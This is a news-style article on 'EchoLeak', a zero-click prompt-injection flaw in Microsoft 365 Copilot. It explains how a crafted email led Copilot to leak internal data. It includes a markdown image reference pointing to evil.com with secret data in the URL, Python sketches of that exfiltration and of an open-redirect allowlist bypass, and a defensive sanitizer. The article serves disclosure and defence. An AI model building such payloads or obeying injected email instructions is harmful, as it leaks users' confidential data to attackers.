
A newly uncovered zero-click exploit in Microsoft 365 Copilot has raised concerns about the hidden risks in enterprise AI tools.
Discovered by cybersecurity firm Aim Security, the vulnerability, dubbed “EchoLeak,” allows attackers to extract confidential business data using a single, specially crafted email, without requiring the victim to open or interact with it.
EchoLeak is reportedly the first documented zero-click attack on an AI agent. The exploit weaponizes Copilot’s contextual understanding, enabling it to process malicious prompts hidden within an email.
Once triggered, Copilot silently accesses internal content—emails, Teams chats, OneDrive files—and transmits that data to an external server, evading Microsoft’s standard defenses.
How EchoLeak Works
The attack works by exploiting Copilot’s dual access to both internal and external data sources.
It begins with an email containing a disguised reference-style markdown image, such as `![Image alt text][ref]` with the definition `[ref]: https://www.evil.com?param=<secret>`.
When Copilot scans the email in the background, it follows the link, embedding sensitive parameters such as user data or chat logs into a request to an attacker-controlled domain.
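The exfiltration pattern can be illustrated with a short sketch. This is not the actual exploit code; the email body, the `PLACEHOLDER` token, and the `render_with_context` function are hypothetical, standing in for how an injected prompt could cause retrieved context to be substituted into an image URL that a renderer then fetches.

```python
import re
from urllib.parse import quote

# Hypothetical email body: a reference-style markdown image whose URL
# carries a placeholder the injected prompt asks the model to fill in.
email_body = """Quarterly review attached.
![Image alt text][ref]

[ref]: https://www.evil.com/logo.png?param=PLACEHOLDER
"""

def render_with_context(markdown: str, sensitive_context: str) -> list[str]:
    """Return the image URLs a naive renderer would fetch after the
    placeholder is replaced with URL-encoded sensitive data."""
    body = markdown.replace("PLACEHOLDER", quote(sensitive_context))
    # Reference-style definitions have the form: [ref]: <url>
    return re.findall(r"^\[[^\]]+\]:\s*(\S+)", body, flags=re.MULTILINE)

urls = render_with_context(email_body, "Q3 revenue: $12M")
# Fetching the image URL transmits the secret to the attacker's server.
print(urls[0])  # https://www.evil.com/logo.png?param=Q3%20revenue%3A%20%2412M
```

The key point is that no click is needed: simply rendering the image reference generates an outbound request whose query string now contains the data.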
According to Aim Security, the exploit works through a chain of weaknesses, including an open redirect that bypasses Microsoft’s Content Security Policy allowlist.
The redirect lets untrusted links masquerade as trusted domains such as Teams or SharePoint.
As a result, Microsoft’s protective mechanisms, such as its defenses against cross-prompt injection attacks, are bypassed.
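The allowlist-bypass idea can be sketched in a few lines. The `/redirect?url=` endpoint below is hypothetical, included only to show why hostname-based allowlisting fails in the presence of an open redirect on a trusted domain.

```python
from urllib.parse import urlparse, parse_qs

# A simplified allowlist check of the kind a CSP-style defense performs.
TRUSTED_HOSTS = {"teams.microsoft.com", "sharepoint.com"}

def is_trusted(url: str) -> bool:
    """Pass any URL whose hostname is on the allowlist."""
    return urlparse(url).hostname in TRUSTED_HOSTS

# An open redirect on a trusted host defeats the check: the URL passes
# validation, but its "url" parameter sends the request elsewhere.
redirect = "https://teams.microsoft.com/redirect?url=https://www.evil.com"
print(is_trusted(redirect))                              # True
print(parse_qs(urlparse(redirect).query)["url"][0])      # real destination
```

Because the check inspects only the hostname, the attacker-controlled destination hidden in the query string is never examined.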
A New Class of AI Vulnerability
The firm classifies the flaw as an “LLM Scope Violation.” This refers to cases where prompts from outside a model’s trusted data environment influence the AI into accessing and leaking information beyond its intended boundary.
Microsoft confirmed the vulnerability was patched and stated that no customers were compromised.
However, Aim Security noted the discovery of similar design flaws in other AI systems, suggesting broader industry-wide risk, especially for platforms using Retrieval-Augmented Generation (RAG).
Recommended Actions
Experts warn that AI-powered assistants should now be treated as potential threat vectors.
“EchoLeak marks a shift to assumption-of-compromise architectures,” said Abhishek Anant Garg, an analyst at QKS Group, speaking to CSO. “Enterprises must now assume adversarial prompt injection will occur,” he added.
Industry leaders recommend robust input validation, strong data isolation policies, and red-team exercises targeting AI agents.
“CIOs must now design AI systems assuming adversarial autonomy,” Garg advised. “Every agent is a potential data leak and must undergo red-team validation before production.”
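One form the recommended input validation could take is stripping external markdown references from retrieved content before it reaches the model. This is a minimal sketch, not a production defense; the `ALLOWED_HOSTS` policy and the function name are illustrative assumptions.

```python
import re
from urllib.parse import urlparse

# Example allowlist policy: only internal collaboration domains may be
# referenced by markdown link/image definitions in retrieved content.
ALLOWED_HOSTS = {"sharepoint.com", "teams.microsoft.com"}

def strip_external_references(markdown: str) -> str:
    """Drop reference-style definitions pointing outside the allowlist,
    so an injected prompt cannot smuggle data out via image fetches."""
    def keep(match: re.Match) -> str:
        host = urlparse(match.group(2)).hostname or ""
        return match.group(0) if host in ALLOWED_HOSTS else ""
    return re.sub(r"^(\[[^\]]+\]):\s*(\S+)\s*$", keep,
                  markdown, flags=re.MULTILINE)

doc = "[ref]: https://www.evil.com?param=secret\n[ok]: https://sharepoint.com/x"
print(strip_external_references(doc))  # only the sharepoint.com line survives
```

Sanitizing content at ingestion, before it enters the model’s context, addresses the scope-violation pattern directly rather than relying on the model to ignore injected instructions.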